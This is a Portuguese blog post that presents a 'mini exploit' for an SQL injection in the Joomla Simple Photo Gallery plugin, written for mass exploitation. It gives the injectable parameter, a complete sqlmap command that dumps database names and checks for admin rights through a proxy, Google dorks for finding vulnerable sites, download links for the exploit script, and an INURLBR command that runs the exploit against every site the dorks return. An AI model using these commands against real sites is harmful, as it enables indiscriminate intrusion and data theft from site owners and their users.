terça-feira, 17 de março de 2015

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

Nenhum comentário:

Postar um comentário

............